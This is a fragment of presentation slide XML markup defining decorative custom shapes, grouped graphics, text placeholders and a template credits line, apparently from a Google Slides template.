            <p:spPr>
              <a:xfrm>
                <a:off x="2814750" y="337125"/>
                <a:ext cx="8725" cy="8700"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="348" w="349">
                    <a:moveTo>
                      <a:pt x="176" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="0"/>
                      <a:pt x="1" y="70"/>
                      <a:pt x="1" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="278"/>
                      <a:pt x="106" y="348"/>
                      <a:pt x="176" y="348"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279" y="348"/>
                      <a:pt x="348" y="278"/>
                      <a:pt x="348" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="70"/>
                      <a:pt x="279" y="0"/>
                      <a:pt x="1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6" name="Google Shape;2426;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2886875" y="274600"/>
                <a:ext cx="16500" cy="16550"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="662" w="660">
                    <a:moveTo>
                      <a:pt x="348" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="0"/>
                      <a:pt x="0" y="139"/>
                      <a:pt x="0" y="314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="523"/>
                      <a:pt x="173" y="662"/>
                      <a:pt x="348" y="662"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="520" y="662"/>
                      <a:pt x="659" y="523"/>
                      <a:pt x="659" y="314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="139"/>
                      <a:pt x="520" y="0"/>
                      <a:pt x="3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7" name="Google Shape;2427;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2814750" y="360550"/>
                <a:ext cx="13100" cy="11775"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="471" w="524">
                    <a:moveTo>
                      <a:pt x="270" y="77"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="319" y="77"/>
                      <a:pt x="368" y="126"/>
                      <a:pt x="417" y="175"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="417" y="281"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="308"/>
                      <a:pt x="407" y="329"/>
                      <a:pt x="392" y="347"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="392" y="347"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="352" y="394"/>
                      <a:pt x="303" y="420"/>
                      <a:pt x="250" y="420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="420"/>
                      <a:pt x="177" y="408"/>
                      <a:pt x="140" y="383"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="281"/>
                      <a:pt x="106" y="142"/>
                      <a:pt x="209" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="85"/>
                      <a:pt x="250" y="77"/>
                      <a:pt x="270" y="77"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="259" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="218" y="0"/>
                      <a:pt x="177" y="12"/>
                      <a:pt x="140" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="142"/>
                      <a:pt x="1" y="314"/>
                      <a:pt x="106" y="420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="455"/>
                      <a:pt x="203" y="470"/>
                      <a:pt x="246" y="470"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="278" y="470"/>
                      <a:pt x="307" y="463"/>
                      <a:pt x="332" y="449"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="332" y="449"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="336" y="452"/>
                      <a:pt x="341" y="453"/>
                      <a:pt x="348" y="453"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="420"/>
                      <a:pt x="523" y="244"/>
                      <a:pt x="454" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="39"/>
                      <a:pt x="334" y="0"/>
                      <a:pt x="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8" name="Google Shape;2428;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3173475" y="406600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9" name="Google Shape;2429;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3332375" y="290225"/>
                <a:ext cx="5225" cy="5225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0" name="Google Shape;2430;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3252475" y="410075"/>
                <a:ext cx="7875" cy="8700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1" name="Google Shape;2431;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3174300" y="291125"/>
                <a:ext cx="8725" cy="7800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2" name="Google Shape;2432;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3251650" y="433500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3" name="Google Shape;2433;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3001525" y="238075"/>
                <a:ext cx="13000" cy="11775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4" name="Google Shape;2434;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3329800" y="871425"/>
                <a:ext cx="13025" cy="11975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5" name="Google Shape;2435;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3656350" y="710775"/>
                <a:ext cx="13025" cy="12150"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="486" w="521">
                    <a:moveTo>
                      <a:pt x="269" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="316" y="69"/>
                      <a:pt x="358" y="118"/>
                      <a:pt x="382" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="201"/>
                      <a:pt x="418" y="237"/>
                      <a:pt x="418" y="306"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="340"/>
                      <a:pt x="348" y="376"/>
                      <a:pt x="312" y="409"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="417"/>
                      <a:pt x="312" y="424"/>
                      <a:pt x="312" y="430"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="312" y="430"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="298" y="436"/>
                      <a:pt x="283" y="438"/>
                      <a:pt x="267" y="438"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="438"/>
                      <a:pt x="183" y="419"/>
                      <a:pt x="140" y="376"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="306"/>
                      <a:pt x="104" y="167"/>
                      <a:pt x="209" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="78"/>
                      <a:pt x="250" y="69"/>
                      <a:pt x="269" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="232" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="1"/>
                      <a:pt x="168" y="9"/>
                      <a:pt x="140" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="131"/>
                      <a:pt x="1" y="306"/>
                      <a:pt x="104" y="409"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="462"/>
                      <a:pt x="189" y="485"/>
                      <a:pt x="233" y="485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="485"/>
                      <a:pt x="292" y="475"/>
                      <a:pt x="319" y="457"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319" y="457"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="321" y="458"/>
                      <a:pt x="323" y="459"/>
                      <a:pt x="325" y="459"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="330" y="459"/>
                      <a:pt x="338" y="455"/>
                      <a:pt x="348" y="445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="445"/>
                      <a:pt x="520" y="237"/>
                      <a:pt x="451" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="401" y="57"/>
                      <a:pt x="315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6" name="Google Shape;2436;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3354950" y="914000"/>
                <a:ext cx="12200" cy="1215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7" name="Google Shape;2437;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3649400" y="838225"/>
                <a:ext cx="13025" cy="11775"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="471" w="521">
                    <a:moveTo>
                      <a:pt x="276" y="77"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="333" y="77"/>
                      <a:pt x="392" y="126"/>
                      <a:pt x="418" y="175"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="418" y="280"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="302"/>
                      <a:pt x="411" y="320"/>
                      <a:pt x="402" y="336"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="402" y="336"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="359" y="390"/>
                      <a:pt x="306" y="420"/>
                      <a:pt x="249" y="420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="420"/>
                      <a:pt x="176" y="408"/>
                      <a:pt x="140" y="383"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="280"/>
                      <a:pt x="104" y="141"/>
                      <a:pt x="209" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="85"/>
                      <a:pt x="253" y="77"/>
                      <a:pt x="276" y="77"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="266" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="0"/>
                      <a:pt x="176" y="11"/>
                      <a:pt x="140" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="141"/>
                      <a:pt x="1" y="314"/>
                      <a:pt x="104" y="419"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="152" y="455"/>
                      <a:pt x="200" y="470"/>
                      <a:pt x="244" y="470"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="276" y="470"/>
                      <a:pt x="305" y="462"/>
                      <a:pt x="330" y="449"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="330" y="449"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="335" y="451"/>
                      <a:pt x="341" y="453"/>
                      <a:pt x="348" y="453"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="419"/>
                      <a:pt x="521" y="244"/>
                      <a:pt x="451" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="429" y="39"/>
                      <a:pt x="348" y="0"/>
                      <a:pt x="2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38" name="Google Shape;2438;p73"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000">
              <a:off x="5297971" y="58692"/>
              <a:ext cx="3840097" cy="2558635"/>
              <a:chOff x="235225" y="2771600"/>
              <a:chExt cx="3133750" cy="2088000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2439" name="Google Shape;2439;p73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0" name="Google Shape;2440;p73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1" name="Google Shape;2441;p73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2" name="Google Shape;2442;p73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3" name="Google Shape;2443;p73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44" name="Google Shape;2444;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7725354" y="4664761"/>
              <a:ext cx="1398984" cy="543375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45" name="Google Shape;2445;p73"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000">
              <a:off x="-5933" y="3588286"/>
              <a:ext cx="3189300" cy="1619850"/>
              <a:chOff x="4185675" y="845125"/>
              <a:chExt cx="3189300" cy="1619850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2446" name="Google Shape;2446;p73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7" name="Google Shape;2447;p73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8" name="Google Shape;2448;p73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49" name="Google Shape;2449;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2952375" y="792400"/>
            <a:ext cx="36771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0" name="Google Shape;2450;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901075" y="3134675"/>
            <a:ext cx="75297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CREDITS: This presentation template was created by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="15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including icons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b="1" i="0" lang="en" sz="15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infographics &amp; images by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="15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1" name="Google Shape;2451;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713275" y="4135975"/>
            <a:ext cx="771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2" name="Google Shape;2452;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1444825"/>
            <a:ext cx="7717500" cy="9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3" name="Google Shape;2453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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724075" y="1553050"/>
            <a:ext cx="38409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456" name="Google Shape;2456;p74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7" name="Google Shape;2457;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4566700" y="1804375"/>
            <a:ext cx="38406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8" name="Google Shape;2458;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724075" y="1804377"/>
            <a:ext cx="3840900" cy="27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9" name="Google Shape;2459;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4564974" y="1553050"/>
            <a:ext cx="38409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2460" name="Google Shape;2460;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="9" y="3399551"/>
            <a:ext cx="3931698" cy="1741541"/>
            <a:chOff x="1076311" y="3270751"/>
            <a:chExt cx="3931698" cy="1741541"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2461" name="Google Shape;2461;p74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402350" y="38718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62" name="Google Shape;2462;p74"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="-5400000">
              <a:off x="2177753" y="2169308"/>
              <a:ext cx="1715385" cy="3918270"/>
              <a:chOff x="10706378" y="539509"/>
              <a:chExt cx="1715385" cy="3918270"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2463" name="Google Shape;2463;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10962050" y="4005280"/>
                <a:ext cx="61635" cy="61635"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="729" w="729">
                    <a:moveTo>
                      <a:pt x="348" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="1"/>
                      <a:pt x="0" y="173"/>
                      <a:pt x="0" y="382"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="557"/>
                      <a:pt x="139" y="729"/>
                      <a:pt x="348" y="729"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="556" y="729"/>
                      <a:pt x="729" y="557"/>
                      <a:pt x="729" y="382"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="729" y="173"/>
                      <a:pt x="556" y="1"/>
                      <a:pt x="348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4" name="Google Shape;2464;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12057532" y="2466178"/>
                <a:ext cx="26632" cy="26379"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="312" w="315">
                    <a:moveTo>
                      <a:pt x="139" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="0"/>
                      <a:pt x="0" y="70"/>
                      <a:pt x="0" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="242"/>
                      <a:pt x="69" y="312"/>
                      <a:pt x="139" y="312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="312"/>
                      <a:pt x="314" y="242"/>
                      <a:pt x="314" y="173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5" name="Google Shape;2465;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12242691" y="3905345"/>
                <a:ext cx="43965" cy="44049"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="521" w="520">
                    <a:moveTo>
                      <a:pt x="242" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="0"/>
                      <a:pt x="0" y="103"/>
                      <a:pt x="0" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="417"/>
                      <a:pt x="103" y="520"/>
                      <a:pt x="242" y="520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="520"/>
                      <a:pt x="520" y="417"/>
                      <a:pt x="520" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="520" y="103"/>
                      <a:pt x="417" y="0"/>
                      <a:pt x="24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6" name="Google Shape;2466;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12313119" y="3942123"/>
                <a:ext cx="104163" cy="89789"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="1062" w="1232">
                    <a:moveTo>
                      <a:pt x="772" y="821"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="772" y="821"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="821"/>
                      <a:pt x="765" y="825"/>
                      <a:pt x="765" y="837"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="787" y="837"/>
                      <a:pt x="780" y="821"/>
                      <a:pt x="772" y="821"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="649" y="104"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="665" y="104"/>
                      <a:pt x="680" y="105"/>
                      <a:pt x="696" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="904" y="143"/>
                      <a:pt x="937" y="421"/>
                      <a:pt x="904" y="559"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="881" y="712"/>
                      <a:pt x="817" y="811"/>
                      <a:pt x="730" y="880"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="730" y="880"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="742" y="867"/>
                      <a:pt x="754" y="853"/>
                      <a:pt x="765" y="837"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="765" y="837"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="679" y="922"/>
                      <a:pt x="589" y="960"/>
                      <a:pt x="505" y="960"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="351" y="960"/>
                      <a:pt x="218" y="831"/>
                      <a:pt x="173" y="629"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="366"/>
                      <a:pt x="384" y="104"/>
                      <a:pt x="649" y="104"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="643" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="1"/>
                      <a:pt x="608" y="2"/>
                      <a:pt x="590" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="243" y="4"/>
                      <a:pt x="1" y="384"/>
                      <a:pt x="104" y="732"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="925"/>
                      <a:pt x="296" y="1022"/>
                      <a:pt x="439" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="470" y="1022"/>
                      <a:pt x="501" y="1018"/>
                      <a:pt x="531" y="1009"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="531" y="1009"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="535" y="1020"/>
                      <a:pt x="543" y="1033"/>
                      <a:pt x="557" y="1046"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="587" y="1057"/>
                      <a:pt x="617" y="1062"/>
                      <a:pt x="645" y="1062"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1058" y="1062"/>
                      <a:pt x="1231" y="1"/>
                      <a:pt x="64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7" name="Google Shape;2467;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11188130" y="539509"/>
                <a:ext cx="76431" cy="72880"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="862" w="904">
                    <a:moveTo>
                      <a:pt x="464" y="126"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="560" y="126"/>
                      <a:pt x="645" y="207"/>
                      <a:pt x="695" y="307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="731" y="376"/>
                      <a:pt x="764" y="446"/>
                      <a:pt x="731" y="515"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="731" y="610"/>
                      <a:pt x="647" y="646"/>
                      <a:pt x="579" y="729"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="579" y="729"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="542" y="746"/>
                      <a:pt x="503" y="756"/>
                      <a:pt x="462" y="756"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="390" y="756"/>
                      <a:pt x="314" y="725"/>
                      <a:pt x="245" y="654"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="515"/>
                      <a:pt x="209" y="274"/>
                      <a:pt x="347" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="387" y="139"/>
                      <a:pt x="426" y="126"/>
                      <a:pt x="464" y="126"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="452" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="383" y="0"/>
                      <a:pt x="312" y="20"/>
                      <a:pt x="245" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="237"/>
                      <a:pt x="0" y="552"/>
                      <a:pt x="175" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="246" y="831"/>
                      <a:pt x="325" y="862"/>
                      <a:pt x="402" y="862"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="461" y="862"/>
                      <a:pt x="518" y="844"/>
                      <a:pt x="570" y="814"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="570" y="814"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="580" y="823"/>
                      <a:pt x="597" y="829"/>
                      <a:pt x="625" y="829"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="870" y="760"/>
                      <a:pt x="903" y="413"/>
                      <a:pt x="800" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="729" y="86"/>
                      <a:pt x="596" y="0"/>
                      <a:pt x="452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8" name="Google Shape;2468;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12028109" y="2213550"/>
                <a:ext cx="79475" cy="72119"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="853" w="940">
                    <a:moveTo>
                      <a:pt x="445" y="135"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="560" y="135"/>
                      <a:pt x="678" y="217"/>
                      <a:pt x="732" y="296"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="765" y="366"/>
                      <a:pt x="765" y="435"/>
                      <a:pt x="732" y="505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="732" y="593"/>
                      <a:pt x="658" y="656"/>
                      <a:pt x="614" y="715"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="614" y="715"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="568" y="747"/>
                      <a:pt x="517" y="763"/>
                      <a:pt x="467" y="763"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="400" y="763"/>
                      <a:pt x="334" y="735"/>
                      <a:pt x="279" y="680"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="505"/>
                      <a:pt x="209" y="263"/>
                      <a:pt x="348" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="379" y="142"/>
                      <a:pt x="412" y="135"/>
                      <a:pt x="445" y="135"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="479" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="410" y="1"/>
                      <a:pt x="340" y="27"/>
                      <a:pt x="279" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="227"/>
                      <a:pt x="1" y="574"/>
                      <a:pt x="209" y="749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="282" y="822"/>
                      <a:pt x="359" y="852"/>
                      <a:pt x="433" y="852"/>
                    </a:cubicBezTo>
